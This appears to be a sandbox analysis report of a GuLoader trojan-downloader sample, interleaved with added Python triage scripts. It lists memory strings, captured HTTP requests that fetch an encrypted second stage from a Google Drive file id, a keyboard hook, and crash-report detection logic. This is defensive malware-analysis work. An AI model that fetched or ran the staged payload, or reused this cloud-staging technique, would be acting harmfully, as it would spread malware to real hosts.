Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe, 00000008.00000002.1323184986.000000000197E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://doc-0o-68-docs.googleusercontent.com/G9
Source: ios.exe, 0000001F.00000003.2411880906.00000000017D4000.00000004.00000020.00020000.00000000.sdmp, ios.exe, 0000001F.00000002.5717770580.0000000001836000.00000004.00000020.00020000.00000000.sdmp, ios.exe, 0000001F.00000002.5716344256.00000000017D4000.00000004.00000020.00020000.00000000.sdmp, ios.exe, 0000001F.00000003.2412474215.0000000001836000.00000004.00000020.00020000.00000000.sdmp, ios.exe, 0000001F.00000003.2412551928.00000000017D4000.00000004.00000020.00020000.00000000.sdmp, ios.exe, 0000001F.00000003.1986487349.000000000184F000.00000004.00000020.00020000.00000000.sdmp, ios.exe, 0000001F.00000003.2413097701.0000000001836000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://doc-0o-68-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/cf8qgqli
Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe, 00000008.00000002.1323318940.0000000001996000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe, 00000008.00000003.1316394922.00000000019A9000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe, 00000008.00000003.1312804686.00000000019A9000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe, 00000008.00000003.1306554035.00000000019B1000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe, 00000008.00000003.1307073351.00000000019B1000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe, 00000008.00000002.1323401970.00000000019A4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://doc-0o-68-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/kdqkjtpb
Source: ios.exe, 0000001F.00000002.5717770580.0000000001836000.00000004.00000020.00020000.00000000.sdmp, ios.exe, 0000001F.00000003.2412474215.0000000001836000.00000004.00000020.00020000.00000000.sdmp, ios.exe, 0000001F.00000003.2413097701.0000000001836000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://doc-0o-68-docs.googleusercontent.com/uR
Source: ios.exe, 0000001F.00000002.5716735626.00000000017F5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/
Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe, 00000008.00000002.1322818122.0000000001938000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/9
Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe, 00000008.00000002.1324049324.0000000001B31000.00000004.00000800.00020000.00000000.sdmp, ios.exe, 0000001F.00000002.5715131284.0000000001788000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/uc?export=download&id=16-ZmAFjeTzH9DAbqoP0u2zSq7p2C4wzm
Source: ios.exe, 0000001F.00000002.5715131284.0000000001788000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/uc?export=download&id=16-ZmAFjeTzH9DAbqoP0u2zSq7p2C4wzmbu
Source: ios.exe, 0000001F.00000001.1820605446.0000000000649000.00000020.00000001.01000000.00000007.sdmp String found in binary or memory: https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214
Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe, 00000000.00000002.1324138586.00000000029C6000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe, 00000000.00000002.1322498052.000000000040A000.00000004.00000001.01000000.00000003.sdmp, ios.exe, 00000019.00000002.2474178921.000000000040A000.00000004.00000001.01000000.0000000C.sdmp, ios.exe, 00000019.00000002.2476168703.00000000029F6000.00000004.00000800.00020000.00000000.sdmp, ios.exe, 0000001A.00000000.1786108323.0000000002927000.00000004.00000800.00020000.00000000.sdmp, ios.exe, 0000001A.00000002.1819378733.000000000040A000.00000004.00000001.01000000.0000000C.sdmp, DiFxAPI.dll.0.dr, vm3ddevapi64-release.dll.0.dr String found in binary or memory: https://www.digicert.com/CPS0
Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe, 00000000.00000002.1324138586.00000000029C6000.00000004.00000800.00020000.00000000.sdmp, ios.exe, 00000019.00000002.2476168703.00000000029F6000.00000004.00000800.00020000.00000000.sdmp, ios.exe, 0000001A.00000000.1786108323.0000000002927000.00000004.00000800.00020000.00000000.sdmp, DiFxAPI.dll.0.dr String found in binary or memory: https://www.digicert.com/CPS0~
Source: portaudio_x64.dll.0.dr String found in binary or memory: https://www.globalsign.com/repository/0
Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe, 00000000.00000002.1324138586.00000000029C6000.00000004.00000800.00020000.00000000.sdmp, ios.exe, 00000019.00000002.2476168703.00000000029F6000.00000004.00000800.00020000.00000000.sdmp, ios.exe, 0000001A.00000000.1786108323.0000000002927000.00000004.00000800.00020000.00000000.sdmp, portaudio_x64.dll.0.dr String found in binary or memory: https://www.globalsign.com/repository/06
Source: unknown DNS traffic detected: queries for: drive.google.com
Source: global traffic HTTP traffic detected: GET /uc?export=download&id=16-ZmAFjeTzH9DAbqoP0u2zSq7p2C4wzm HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
    Host: drive.google.com
    Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/kdqkjtpbbdq1ma5od724n4arlrasmcfv/1653325275000/16125903511617426447/*/16-ZmAFjeTzH9DAbqoP0u2zSq7p2C4wzm?e=download HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
    Cache-Control: no-cache
    Host: doc-0o-68-docs.googleusercontent.com
    Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /uc?export=download&id=16-ZmAFjeTzH9DAbqoP0u2zSq7p2C4wzm HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
    Host: drive.google.com
    Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/cf8qgqli4rihm7727e1v30p2jqpcricp/1653325350000/16125903511617426447/*/16-ZmAFjeTzH9DAbqoP0u2zSq7p2C4wzm?e=download HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
    Cache-Control: no-cache
    Host: doc-0o-68-docs.googleusercontent.com
    Connection: Keep-Alive
Source: unknown HTTPS traffic detected: 142.250.186.142:443 -> 192.168.11.20:49764 version: TLS 1.2
Source: unknown HTTPS traffic detected: 142.250.185.129:443 -> 192.168.11.20:49765 version: TLS 1.2
Source: unknown HTTPS traffic detected: 142.250.186.142:443 -> 192.168.11.20:49770 version: TLS 1.2
Source: unknown HTTPS traffic detected: 142.250.185.129:443 -> 192.168.11.20:49771 version: TLS 1.2
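Most of the URL strings above are not indicators at all: the OCSP, CRL, CPS and repository addresses come from the Authenticode signature chains of the bundled DLLs (DiFxAPI.dll, vm3ddevapi64-release.dll, portaudio_x64.dll), and the trailing characters on them ("0C", "0L", "09") are the DER element that follows a URL inside an X.509 certificate (0x30 SEQUENCE, printed as "0", plus a length byte). The actionable part is the Google Drive fetch: drive.google.com/uc?export=download with a file id, redirected to a googleusercontent.com securesc path, issued twice with an Internet Explorer Trident user agent; GuLoader routinely pulls its encrypted second stage from public cloud storage this way. The following Python triage script is an added example, not part of the Joe Sandbox report and not code from the sample. It runs over a constructed subset of lines in the shape printed above, splits the captured requests (the text export runs the request line and headers together, so the split keys on an assumed list of header names), files the PKI strings separately, and extracts the Drive file id from both memory strings and traffic. The https scheme for the captured requests is assumed from the TLS 1.2 connections to the same hosts on port 443.

```python
"""Triage helper for the 'String found in binary or memory' and 'HTTP traffic
detected' lines of a Joe Sandbox text export: separate certificate-chain URLs
(from the Authenticode signatures of bundled DLLs) from the cloud-storage
download that is the real indicator, repair the DER debris glued to the PKI
strings, and pull the Google Drive file id out of memory strings and requests."""
import re
from urllib.parse import parse_qs, urlsplit

# Constructed sample in the shape of the report lines (a subset, not the full list).
SAMPLE_LINES = [
    "Source: ios.exe, 00000019.00000002.2476168703.00000000029F6000.00000004.00000800.00020000.00000000.sdmp, vm3ddevapi64-release.dll.0.dr String found in binary or memory: http://ocsp.digicert.com0L",
    "Source: portaudio_x64.dll.0.dr String found in binary or memory: https://www.globalsign.com/repository/0",
    "Source: ios.exe.8.dr String found in binary or memory: http://repository.certum.pl/ctnca.cer09",
    "Source: ios.exe, 0000001F.00000002.5715131284.0000000001788000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/uc?export=download&id=16-ZmAFjeTzH9DAbqoP0u2zSq7p2C4wzmbu",
    "Source: ios.exe, 0000001F.00000001.1820408764.0000000000626000.00000020.00000001.01000000.00000007.sdmp String found in binary or memory: http://www.ibm.com/data/dtd/v11/ibmxhtml1-transitional.dtd-//W3O//DTD",
    "Source: global traffic HTTP traffic detected: GET /uc?export=download&id=16-ZmAFjeTzH9DAbqoP0u2zSq7p2C4wzm HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: drive.google.comCache-Control: no-cache",
    "Source: global traffic HTTP traffic detected: GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/kdqkjtpbbdq1ma5od724n4arlrasmcfv/1653325275000/16125903511617426447/*/16-ZmAFjeTzH9DAbqoP0u2zSq7p2C4wzm?e=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoCache-Control: no-cacheHost: doc-0o-68-docs.googleusercontent.comConnection: Keep-Alive",
]

STRING_RE = re.compile(r"String found in binary or memory: (\S+)$")
REQUEST_RE = re.compile(r"HTTP traffic detected: (GET|POST|HEAD) (\S+) (HTTP/\d\.\d)(.*)$")
# The export prints headers back to back ("...like GeckoHost: ..."), so the split
# has to key on known header names (assumed list; longer names listed first).
HEADER_NAMES = ("User-Agent", "Cache-Control", "Content-Length", "Content-Type",
                "Accept-Encoding", "Accept-Language", "Connection", "Accept",
                "Host", "Pragma")
_NAMES = "|".join(re.escape(n) for n in HEADER_NAMES)
HEADER_RE = re.compile(rf"({_NAMES}): (.*?)(?=(?:{_NAMES}): |$)")
# Hosts and paths that belong to certificate validation, not to the malware.
PKI_HOST_RE = re.compile(r"ocsp|crl|symcb|symcd|symauth|digicert|globalsign|certum", re.I)
PKI_PATH_RE = re.compile(r"\.(crl|crt|cer)(?![a-z])|/cps|/rpa|/repository", re.I)


def strip_der_tail(url):
    """A URL lifted out of a certificate is followed in memory by the next DER
    element: 0x30 (SEQUENCE, printed as '0') plus one length byte. Drop them."""
    return re.sub(r"0.?$", "", url)


def classify(url):
    """'pki' for certificate-chain strings, 'download' for the Google Drive
    fetch, 'other' for anything that still needs a human look."""
    parts = urlsplit(url)
    host = parts.netloc.lower()
    if PKI_HOST_RE.search(host) or PKI_PATH_RE.search(parts.path):
        return "pki"
    if host == "drive.google.com" or host.endswith(".googleusercontent.com"):
        return "download"
    return "other"


def drive_file_id(url):
    """Google Drive file id from a drive.google.com/uc?export=download URL or
    from the googleusercontent securesc path it redirects to, else None."""
    parts = urlsplit(url)
    host = parts.netloc.lower()
    if host == "drive.google.com":
        ids = parse_qs(parts.query).get("id")
        return ids[0] if ids else None
    if host.endswith(".googleusercontent.com") and "/securesc/" in parts.path:
        # /docs/securesc/<token>/<token>/<ms timestamp>/<account id>/*/<file id>
        segs = parts.path.split("/")
        if "*" in segs and segs.index("*") + 1 < len(segs):
            return segs[segs.index("*") + 1]
    return None


def parse_request(line):
    """Split a glued 'HTTP traffic detected' line into method, path, version
    and a header dict; None if the line is not a request."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    method, path, version, blob = m.groups()
    return {"method": method, "path": path, "version": version,
            "headers": dict(HEADER_RE.findall(blob))}


def triage(lines):
    out = {"pki": set(), "download": set(), "other": set(),
           "file_ids_memory": set(), "file_ids_traffic": set(), "requests": []}
    for line in lines:
        m = STRING_RE.search(line)
        if m:
            url = m.group(1)
            kind = classify(url)
            out[kind].add(strip_der_tail(url) if kind == "pki" else url)
            fid = drive_file_id(url)
            if fid:
                out["file_ids_memory"].add(fid)
            continue
        req = parse_request(line)
        if req:
            out["requests"].append(req)
            # Scheme assumed: the report shows the same hosts on 443 / TLS 1.2.
            fid = drive_file_id("https://" + req["headers"].get("Host", "") + req["path"])
            if fid:
                out["file_ids_traffic"].add(fid)
    return out


if __name__ == "__main__":
    result = triage(SAMPLE_LINES)
    for kind in ("download", "other", "pki"):
        print(kind, sorted(result[kind]))
    print("file id (traffic, authoritative):", sorted(result["file_ids_traffic"]))
    print("file id (memory, may carry extra bytes):", sorted(result["file_ids_memory"]))
```

Pivot on the file id taken from the traffic. The copy recovered from process memory ends in two extra characters ("...wzmbu") because the string scanner picked up adjacent printable bytes, the same effect that leaves DER debris on the certificate URLs, so a memory string is a lead, not a verified value.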

Key, Mouse, Clipboard, Microphone and Screen Capturing

Source: C:\Users\user\AppData\Roaming\ios.exe Windows user hook set: 0 keyboard low level C:\Users\user\AppData\Roaming\ios.exe
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe Code function: 0_2_00405809 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard, 0_2_00405809

E-Banking Fraud

Source: Yara match File source: 00000008.00000003.1316394922.00000000019A9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000002.5717991777.0000000001847000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.1323401970.00000000019A4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe PID: 996, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: ios.exe PID: 8752, type: MEMORYSTR
Source: SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Source: C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_ios.exe_32bff45bee1557a39d49c4ca2c5bff414e93ae12_bcb1b634_99970dd0-5d80-4a04-b43a-60dbb6c644b1\Report.wer, type: DROPPED Matched rule: SUSP_WER_Suspicious_Crash_Directory date = 2019-10-18, author = Florian Roth, description = Detects a crashed application executed in a suspicious directory, reference = https://twitter.com/cyb3rops/status/1185585050059976705, score =
Source: C:\Users\user\AppData\Roaming\ios.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 8688 -s 1072
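The Report.wer hit above is Florian Roth's rule firing on nothing more than the crash location: ios.exe ran, and crashed, from C:\Users\user\AppData\Roaming, and Windows Error Reporting recorded that path when WerFault.exe was launched for it (-p 8688 is the id of the crashing process). That is a cheap host-side check, because WER keeps these reports under C:\ProgramData\Microsoft\Windows\WER even after the malware has cleaned up. The Python script below is an added example, not part of the report and not the rule itself: it applies the same idea to Report.wer files. The directory watch list, the name-mismatch checks and the sample report body are assumptions for the example.

```python
"""Flag Windows Error Reporting crash reports whose crashing binary ran from a
user-writable or otherwise unusual directory, the idea behind the
SUSP_WER_Suspicious_Crash_Directory match above."""
import re
from pathlib import Path, PureWindowsPath

# Constructed Report.wer body. Real files are UTF-16 LE key=value text with
# many more keys; only the ones read here are included.
SAMPLE_WER = (
    "Version=1\r\n"
    "EventType=APPCRASH\r\n"
    "Sig[0].Name=Application Name\r\n"
    "Sig[0].Value=ios.exe\r\n"
    "AppName=ios.exe\r\n"
    "AppPath=C:\\Users\\user\\AppData\\Roaming\\ios.exe\r\n"
).encode("utf-16-le")

# Assumed watch list: places an installed application rarely crashes from,
# but droppers and downloaders routinely run from.
SUSPICIOUS_DIR_RE = re.compile(
    r"\\AppData\\Roaming\\[^\\]+$"       # file dropped straight into %APPDATA%
    r"|\\AppData\\Local\\Temp\\"         # %TEMP%
    r"|\\Users\\[^\\]+\\Downloads\\"
    r"|\\Users\\Public\\"
    r"|\\ProgramData\\[^\\]+$"           # file directly under %ProgramData%
    r"|\\Windows\\Temp\\"
    r"|\\Windows\\Tasks\\"
    r"|\\\$Recycle\.Bin\\",
    re.I,
)


def parse_wer(data):
    """Decode Report.wer bytes (UTF-16 LE with or without BOM; UTF-8 fallback)
    into a dict. WER writes some keys more than once; the last value wins."""
    if data.startswith(b"\xff\xfe") or b"\x00" in data[:4]:
        text = data.decode("utf-16-le", errors="replace").lstrip("\ufeff")
    else:
        text = data.decode("utf-8", errors="replace")
    fields = {}
    for line in text.splitlines():
        key, sep, value = line.partition("=")
        if sep:
            fields[key.strip()] = value.strip()
    return fields


def assess(fields):
    """Return the reasons a crash report looks suspicious (empty list if none)."""
    reasons = []
    app_path = fields.get("AppPath", "")
    if not app_path:
        return reasons
    if SUSPICIOUS_DIR_RE.search(app_path):
        reasons.append(f"crashing binary ran from a user-writable/unusual directory: {app_path}")
    file_name = PureWindowsPath(app_path).name.lower()
    reported = fields.get("AppName", "").lower()
    if reported and reported != file_name:
        reasons.append(f"AppName {reported!r} does not match AppPath file name {file_name!r}")
    if fields.get("Sig[0].Name") == "Application Name" and \
            fields.get("Sig[0].Value", "").lower() not in ("", file_name):
        reasons.append("Sig[0].Value application name does not match AppPath")
    return reasons


def triage_report(data):
    fields = parse_wer(data)
    reasons = assess(fields)
    return {"app_path": fields.get("AppPath"), "event": fields.get("EventType"),
            "suspicious": bool(reasons), "reasons": reasons}


def scan_report_queue(root=r"C:\ProgramData\Microsoft\Windows\WER"):
    """Walk ReportQueue and ReportArchive on a live host, yielding suspicious reports."""
    for wer in Path(root).rglob("Report.wer"):
        verdict = triage_report(wer.read_bytes())
        if verdict["suspicious"]:
            yield str(wer), verdict


if __name__ == "__main__":
    print(triage_report(SAMPLE_WER))
```

On a live host, `for path, verdict in scan_report_queue(): print(path, verdict)` walks both ReportQueue and ReportArchive; the crash here also carries a sandbox-specific lesson, since a 32-bit process that dies under instrumentation (the page lists one or more crashing processes) still leaves this trail.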
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe Code function: 0_2_00403640 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess, 0_2_00403640
Source: C:\Users\user\AppData\Roaming\ios.exe Code function: 25_2_00403640 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess, 25_2_00403640
Source: C:\Users\user\AppData\Roaming\ios.exe Code function: 26_2_00403640 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess, 26_2_00403640
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe Code function: 0_2_00406D5F 0_2_00406D5F
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe Code function: 0_2_6F7C1BFF 0_2_6F7C1BFF
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe Code function: 0_2_032D1CD8 0_2_032D1CD8
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe Code function: 0_2_032C6707 0_2_032C6707
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe Code function: 0_2_032C7B7A 0_2_032C7B7A
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe Code function: 0_2_032C63A1 0_2_032C63A1
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe Code function: 0_2_032C65A3 0_2_032C65A3
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe Code function: 0_2_032CA5B0 0_2_032CA5B0
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe Code function: 0_2_032C61B3 0_2_032C61B3
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe Code function: 0_2_032C678C 0_2_032C678C
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe Code function: 0_2_032C7D8C 0_2_032C7D8C
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe Code function: 0_2_032D2191 0_2_032D2191
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe Code function: 0_2_032C65FF 0_2_032C65FF
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe Code function: 0_2_032D2BF7 0_2_032D2BF7
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe Code function: 0_2_032C51D6 0_2_032C51D6
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe Code function: 0_2_032C7C34 0_2_032C7C34
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe Code function: 0_2_032C0001 0_2_032C0001
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe Code function: 0_2_032C6201 0_2_032C6201
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe Code function: 0_2_032CAC1C 0_2_032CAC1C
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe Code function: 0_2_032C681D 0_2_032C681D
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe Code function: 0_2_032C6879 0_2_032C6879
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe Code function: 0_2_032C6474 0_2_032C6474
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe Code function: 0_2_032C664B 0_2_032C664B
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe Code function: 0_2_032C7657 0_2_032C7657
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe Code function: 0_2_032C6253 0_2_032C6253
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe Code function: 0_2_032C62B3 0_2_032C62B3
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe Code function: 0_2_032D248D 0_2_032D248D
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe Code function: 0_2_032C628B 0_2_032C628B
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe Code function: 0_2_032C689F 0_2_032C689F
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe Code function: 0_2_032D16EF 0_2_032D16EF
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe Code function: 0_2_032C62EF 0_2_032C62EF
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe Code function: 0_2_032C64FF 0_2_032C64FF
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe Code function: 0_2_032D28F6 0_2_032D28F6
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe Code function: 0_2_032C7CC5 0_2_032C7CC5
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe Code function: 8_2_01667B29 8_2_01667B29
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe Code function: 8_2_01668908 8_2_01668908
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe Code function: 8_2_0166F9C4 8_2_0166F9C4
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe Code function: 8_2_01663E9F 8_2_01663E9F
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe Code function: 8_2_0166829C 8_2_0166829C
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe Code function: 8_2_01664565 8_2_01664565
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe Code function: 8_2_01664160 8_2_01664160
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe Code function: 8_2_01663F77 8_2_01663F77
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe Code function: 8_2_01665343 8_2_01665343
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe Code function: 8_2_01665920 8_2_01665920
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe Code function: 8_2_01664337 8_2_01664337
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe Code function: 8_2_01663F3F 8_2_01663F3F
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.1305.exe Code function: 8_2_01664509 8_2_01664509
